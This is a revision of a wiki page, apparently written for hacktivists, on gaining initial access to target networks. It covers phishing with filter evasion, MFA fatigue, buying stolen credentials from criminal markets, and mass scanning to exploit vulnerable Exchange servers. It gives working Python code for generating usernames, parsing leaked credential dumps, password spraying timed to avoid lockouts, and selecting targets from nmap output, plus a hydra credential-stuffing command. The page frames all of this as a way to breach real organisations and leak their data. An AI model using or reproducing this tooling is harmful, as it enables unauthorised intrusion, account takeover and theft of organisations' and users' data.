Initial Access Tactics, techniques and procedures: Difference between revisions
Revision as of 22:27, 22 April 2023
Phishing
Phishing is the most common initial access method favoured by advanced persistent threat (APT) groups and organised cybercrime gangs, because it relies on social engineering rather than on a technical flaw: the target is tricked into opening a malicious email attachment or clicking a malicious link. As hacktivists we want to find a way into the target's network as quickly and easily as possible, to leak documents, expose lies and corruption and free the truth!
Tools
- https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
- https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
- https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
- https://www.xanthus.io/mastering-the-simulated-phishing-attack
- https://github.com/Arno0x/EmbedInHTML
- https://github.com/L4bF0x/PhishingPretexts
- http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
- https://book.hacktricks.xyz/phishing-methodology
- https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
- https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
- https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
- https://getgophish.com/ Be sure to remove the identifying headers gophish adds to every mail by default (X-Gophish-Contact and X-Gophish-Signature) and to rename its rid tracking parameter, since mail filters fingerprint both
- https://github.com/curtbraz/PhishAPI
- https://github.com/edoverflow/can-i-take-over-xyz
- https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
Password Attacks
Groups like Lapsus$ have shown the world that you don't need to be a great technical hacker to pwn massive corporations: if basic password and multi-factor authentication (MFA) attacks work against the likes of Uber, Rockstar Games and Okta, they will work against our hacktivist targets too.
If your target uses MFA you can try either social engineering (for example posing as IT support and asking the user to approve a prompt) or MFA fatigue, i.e. triggering push notifications over and over until the user approves one just to make them stop.
Username creation based on recon/osint
- https://github.com/Mebus/cupp
- https://github.com/digininja/RSMangler
- https://github.com/sc0tfree/mentalist
- https://github.com/urbanadventurer/username-anarchy
- https://github.com/vysecurity/LinkedInt
- https://github.com/initstring/linkedin2username
- https://bitbucket.org/grimhacker/office365userenum/src/master
- https://github.com/shroudri/username_generator
- https://github.com/digininja/CeWL
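The tools above generate candidate usernames from recon'd names; the following is an added example (not code from the page or from any of the tools listed) of the two steps a practitioner actually does with them: enumerate the common corporate username formats for a name, and, once OSINT has turned up one real address, infer which format the target uses and apply it to the whole list. The names and the target.example domain are constructed for the demo.

```python
"""Username candidates from recon'd names, and format inference from one
known address. Added example; the PATTERNS table is a common subset of
corporate formats, not an exhaustive list."""
import re
import unicodedata

PATTERNS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "firstlast": lambda f, l: f"{f}{l}",
    "flast": lambda f, l: f"{f[0]}{l}",
    "f.last": lambda f, l: f"{f[0]}.{l}",
    "firstl": lambda f, l: f"{f}{l[0]}",
    "first_last": lambda f, l: f"{f}_{l}",
    "first-last": lambda f, l: f"{f}-{l}",
    "lastfirst": lambda f, l: f"{l}{f}",
    "last.first": lambda f, l: f"{l}.{f}",
    "lastf": lambda f, l: f"{l}{f[0]}",
    "first": lambda f, l: f,
    "last": lambda f, l: l,
}


def normalize_name(full_name):
    """'José Q. Núñez-Smith' -> ('jose', 'nunezsmith'): strip accents, case and
    punctuation, keep the first token and the (possibly hyphenated) last one."""
    ascii_name = unicodedata.normalize("NFKD", full_name).encode("ascii", "ignore").decode()
    tokens = [re.sub(r"[^a-z0-9]", "", t) for t in ascii_name.lower().split()]
    tokens = [t for t in tokens if t]
    if not tokens:
        raise ValueError(f"no usable name in {full_name!r}")
    return tokens[0], tokens[-1]


def candidates(full_name, domain=None):
    """Every pattern applied to one name, deduplicated, in PATTERNS order."""
    first, last = normalize_name(full_name)
    names = dict.fromkeys(fn(first, last) for fn in PATTERNS.values())
    return [f"{n}@{domain}" if domain else n for n in names]


def infer_pattern(full_name, known_email):
    """Given one person's real address found via OSINT, return the pattern
    name that produces its local part, or None if no known pattern fits."""
    first, last = normalize_name(full_name)
    local = known_email.split("@", 1)[0].lower()
    for name, fn in PATTERNS.items():
        if fn(first, last) == local:
            return name
    return None


def apply_pattern(full_names, pattern, domain):
    """Apply one inferred pattern to the whole recon list (deduplicated)."""
    fn = PATTERNS[pattern]
    out = [f"{fn(*normalize_name(n))}@{domain}" for n in full_names]
    return list(dict.fromkeys(out))


if __name__ == "__main__":
    # constructed demo data
    fmt = infer_pattern("Jane Q. Public", "j.public@target.example")
    print(fmt, apply_pattern(["John Smith", "José Núñez"], fmt, "target.example"))
```

When no real address is known, feed the full candidates() output to a spraying tool or to an enumeration method that distinguishes valid from invalid accounts; once one format is confirmed, switch to apply_pattern() so the spray touches far fewer non-existent users.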
Passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords
- https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
- https://github.com/ihebski/DefaultCreds-cheat-sheet
Password cracking tools
- https://www.kali.org/tools/ncrack
- https://www.kali.org/tools/wfuzz
- https://www.kali.org/tools/medusa
- https://www.kali.org/tools/patator
- https://www.kali.org/tools/hydra
A basic example using a credential list in email:pass or user:pass format (one pair per line, passed with -C instead of -L/-P). The string after the last colon is the text hydra looks for in the response to recognise a failed login, so copy it verbatim from a real bad-login page; -s sets the port and -S tells hydra to use TLS:
hydra -C creds.txt -s 443 -S target.com http-post-form "/login:username=^USER^&password=^PASS^:These credentials do not match our records."
Searching leaks
- https://github.com/khast3x/h8mail [Free, but some of the back-end services it queries are paid]
Services
Please note: DO NOT use intelx[.]io, as they have been seen doxing hackers in the past and they block the use of Tor. AVOID!
- https://haveibeenpwned.com
- https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
- https://dehashed.com [Paid. Accepts crypto (BTC)]
Once the leaks have been downloaded, parse the results into email:pass format (one pair per line) so they can be fed straight into hydra -C or a spraying tool.
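Leak dumps rarely arrive in one clean layout, so the following added example (not code from the page or from h8mail or any service listed above) normalises the common combo-list variants into email:pass lines: it accepts colon, semicolon, tab, comma or pipe separators with or without quoting, keeps passwords that themselves contain separators, lowercases and deduplicates addresses, drops empty passwords and optionally keeps only the target's domains. SAMPLE_DUMP is constructed and is not real breach data.

```python
"""Normalise leak dumps into email:pass lines. Added example."""
import re

EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")
# ':' is tried first because combo lists use it; a separator is only accepted
# when the text before it is a valid address, so a password like "Pa:ss;word"
# survives when the dump itself is ';'-separated.
SEPARATORS = (":", ";", "\t", ",", "|")

SAMPLE_DUMP = """# constructed sample dump, not real data
alice@target.example:Summer2022!
bob@target.example;Pa:ss;word
"carol@target.example","hunter2"
dave@other.example:irrelevant
Alice@Target.example:Summer2022!
this line has no separator
eve@target.example:
"""


def parse_leak_line(line):
    """Return (email, password) or None when the line is not a credential."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    for sep in SEPARATORS:
        if sep not in line:
            continue
        left, right = line.split(sep, 1)
        email = left.strip().strip("\"'")
        password = right.strip().strip("\"'")
        if EMAIL_RE.match(email) and password:
            return email.lower(), password
    return None


def parse_leak(text, target_domains=None):
    """Parse a dump into deduplicated email:pass lines, optionally keeping
    only addresses under the given domains (a set of lowercase names)."""
    out, seen = [], set()
    for raw in text.splitlines():
        rec = parse_leak_line(raw)
        if rec is None:
            continue
        email, password = rec
        domain = email.rsplit("@", 1)[1]
        if target_domains and domain not in target_domains:
            continue
        if (email, password) in seen:
            continue
        seen.add((email, password))
        out.append(f"{email}:{password}")
    return out


if __name__ == "__main__":
    print("\n".join(parse_leak(SAMPLE_DUMP, {"target.example"})))
```

The output is exactly the format hydra -C expects; run parse_leak() without target_domains when the dump is already scoped to the target and you want to keep personal addresses for password-reuse guesses.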
Buying access
WARNING! The Genesis market has been seized by the authorities. They still operate a v3 Tor onion address, but it's unclear whether the feds have back-end access to the market, so for safety we won't list it here. See the Genesis admin response.
You can use the Genesis market to purchase credentials stolen from targets by info-stealer malware. Search for your target there to see if you can make a quick win by buying an admin account; any account that gives internal access is a great start. Invites can be found on forums and markets.
You can also find access brokers selling network access inside companies on forums. Services include, but are not limited to, account credentials, shells, implants and other remote access (RDP, VPN, SSH, etc.).
- https://xss.is
- https://exploit.in [Free & Paid]
Password spraying
- https://github.com/dafthack/MSOLSpray
- https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
- https://github.com/blacklanternsecurity/TREVORspray
- https://github.com/knavesec/CredMaster
- https://github.com/xFreed0m/RDPassSpray
- https://github.com/dafthack/MailSniper
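What separates spraying from plain brute force is the order of attempts and the pacing: one password across all users, with each user kept under the lockout threshold inside the observation window. The following is an added example (not code from the page or from any tool listed above) of that scheduling logic. It assumes a caller-supplied attempt_fn(user, password) -> bool (in real use a wrapper around a single login request to the target portal); FakeTarget and FakeClock are constructed stand-ins so it runs offline, and the 3-strikes / 30-minute policy in demo() is an assumed example, not a documented default of any product.

```python
"""Lockout-aware password spraying loop. Added example."""
import time
from collections import defaultdict, deque


class FakeClock:
    """Constructed clock: time only advances when the sprayer sleeps."""

    def __init__(self):
        self.now = 0.0
        self.slept = 0.0

    def time(self):
        return self.now

    def sleep(self, seconds):
        self.now += seconds
        self.slept += seconds


class FakeTarget:
    """Constructed target: a dict of valid credentials plus an attempt log."""

    def __init__(self, valid):
        self.valid = valid
        self.attempts = defaultdict(list)

    def attempt(self, user, password):
        self.attempts[user].append(password)
        return self.valid.get(user) == password


def spray(users, passwords, attempt_fn, lockout_threshold, observation_window,
          safety_margin=1, clock=time.monotonic, sleep=time.sleep):
    """Spray password-first (one password across every user), keeping each
    user below lockout_threshold attempts within any observation_window
    seconds. Budget per window is lockout_threshold - safety_margin; when a
    user has used it, the loop sleeps until that user's oldest attempt has
    aged out rather than risk a lockout. Returns a list of (user, password)."""
    budget = lockout_threshold - safety_margin
    if budget < 1:
        raise ValueError("lockout_threshold must exceed safety_margin")
    history = defaultdict(deque)   # user -> timestamps of recent attempts
    remaining = list(users)        # users not yet cracked
    hits = []

    def prune(user, now):
        q = history[user]
        while q and now - q[0] >= observation_window:
            q.popleft()
        return q

    for password in passwords:
        for user in list(remaining):
            q = prune(user, clock())
            if len(q) >= budget:
                # wait until the oldest attempt falls outside the window
                sleep(observation_window - (clock() - q[0]))
                q = prune(user, clock())
            q.append(clock())
            if attempt_fn(user, password):
                hits.append((user, password))
                remaining.remove(user)  # never keep hitting a cracked account
    return hits


def demo():
    """Spray the constructed target under an assumed 3-strikes / 30-minute
    policy; returns (hits, seconds slept, attempts per user)."""
    clock = FakeClock()
    target = FakeTarget({"bob@target.example": "Winter2023!"})
    users = ["alice@target.example", "bob@target.example", "carol@target.example"]
    passwords = ["Spring2023!", "Summer2023!", "Winter2023!",
                 "Password1", "Welcome1", "Autumn2023!"]
    hits = spray(users, passwords, target.attempt,
                 lockout_threshold=3, observation_window=1800,
                 clock=clock.time, sleep=clock.sleep)
    return hits, clock.slept, {u: len(p) for u, p in target.attempts.items()}


if __name__ == "__main__":
    print(demo())
```

With a budget of two attempts per user per half hour, six passwords against three users cost an hour of waiting in the demo; that is the real cost of spraying and the reason the password list is ordered most-likely-first (season+year, company name, "Welcome1") rather than by wordlist size.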
Hash cracking
- https://hashes.com/en/decrypt/hash [Free & Paid]
- https://crackstation.net
- https://github.com/hashcat/hashcat
- https://github.com/openwall/john
Targeted spray and pray
As the Guacamaya leaks showed, hacktivists can benefit from a highly targeted spray-and-pray campaign: scan the IP ranges of countries of interest, or the target companies' own ranges, for critical vulnerabilities and grep out the hosts that belong to your target domains. Guacamaya scanned for ProxyShell, exploited the vulnerable Microsoft Exchange servers, pulled all of their targets' mailboxes and leaked them. You can do the same. See the scanning and recon page for tools such as nuclei and the nmap scripting engine (NSE) to scan the IP addresses you discover. You can resolve the IP addresses to their domains (reverse DNS lookup) with
nmap -Pn -sS -R -iL targets.txt -oA results
Nmap already does reverse lookups for the hosts it finds up, including during an NSE vulnerability scan; -R forces the lookup for every address in the list, so hosts that do not answer still get a name you can grep on.
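The "grep out targeted domains" step is easiest against the greppable .gnmap file that -oA writes. The following is an added example (not code from the page) that parses it, keeps hosts whose reverse-DNS name sits under a target domain and which have the required ports open (443 alone for a web portal, 443 plus 25 for a likely Exchange server), and lists hosts with no PTR record separately so they are not silently dropped. SAMPLE_GNMAP is a constructed excerpt using documentation addresses (203.0.113.0/24) and .example names, not real scan output.

```python
"""Select targets from nmap -oA output by reverse-DNS domain. Added example."""
import re

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)$")

SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.93 scan initiated Sat Apr 22 22:00:00 2023 as: nmap -Pn -sS -R -iL targets.txt -oA results",
    "Host: 203.0.113.10 (mail.target.example)\tStatus: Up",
    "Host: 203.0.113.10 (mail.target.example)\tPorts: 25/open/tcp//smtp///, 443/open/tcp//https///, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (997)",
    "Host: 203.0.113.11 (www.target.example)\tStatus: Up",
    "Host: 203.0.113.11 (www.target.example)\tPorts: 80/open/tcp//http///, 443/open/tcp//https///\tIgnored State: closed (998)",
    "Host: 203.0.113.12 (owa.other.example)\tStatus: Up",
    "Host: 203.0.113.12 (owa.other.example)\tPorts: 443/open/tcp//https///\tIgnored State: closed (999)",
    "Host: 203.0.113.13 ()\tStatus: Up",
    "Host: 203.0.113.13 ()\tPorts: 443/open/tcp//https///\tIgnored State: closed (999)",
    "# Nmap done at Sat Apr 22 22:10:00 2023 -- 4 IP addresses (4 hosts up) scanned in 600.00 seconds",
])


def parse_gnmap(text):
    """Return {ip: {"rdns": name or "", "open": {port: service}}}.
    Fields on a Host line are tab separated; each Ports entry has the form
    port/state/proto/owner/service/rpc/version/."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host: "):
            continue
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, rdns = m.group(1), m.group(2)
        host = hosts.setdefault(ip, {"rdns": rdns, "open": {}})
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                parts = entry.split("/")
                if len(parts) >= 5 and parts[1] == "open":
                    host["open"][int(parts[0])] = parts[4]
    return hosts


def in_scope(rdns, domains):
    """True when rdns equals or is a subdomain of one of the target domains."""
    rdns = rdns.lower().rstrip(".")
    return any(rdns == d or rdns.endswith("." + d) for d in domains)


def select_targets(hosts, domains, required_ports):
    """Hosts under a target domain with every port in required_ports open,
    as sorted (ip, rdns) tuples. Hosts without a PTR record are excluded."""
    return sorted(
        (ip, h["rdns"]) for ip, h in hosts.items()
        if h["rdns"] and in_scope(h["rdns"], domains)
        and required_ports <= set(h["open"])
    )


def unresolved(hosts):
    """IPs with no PTR record even after -R; review these by hand (TLS
    certificate names or HTTP redirects usually give the owner away)."""
    return sorted(ip for ip, h in hosts.items() if not h["rdns"])


if __name__ == "__main__":
    hosts = parse_gnmap(SAMPLE_GNMAP)
    print(select_targets(hosts, {"target.example"}, {443, 25}))
    print(unresolved(hosts))
```

Reverse DNS only finds hosts whose PTR records the owner bothered to set; the unresolved() list and any shared-hosting addresses still need a second look by certificate name before you spend exploitation effort on them.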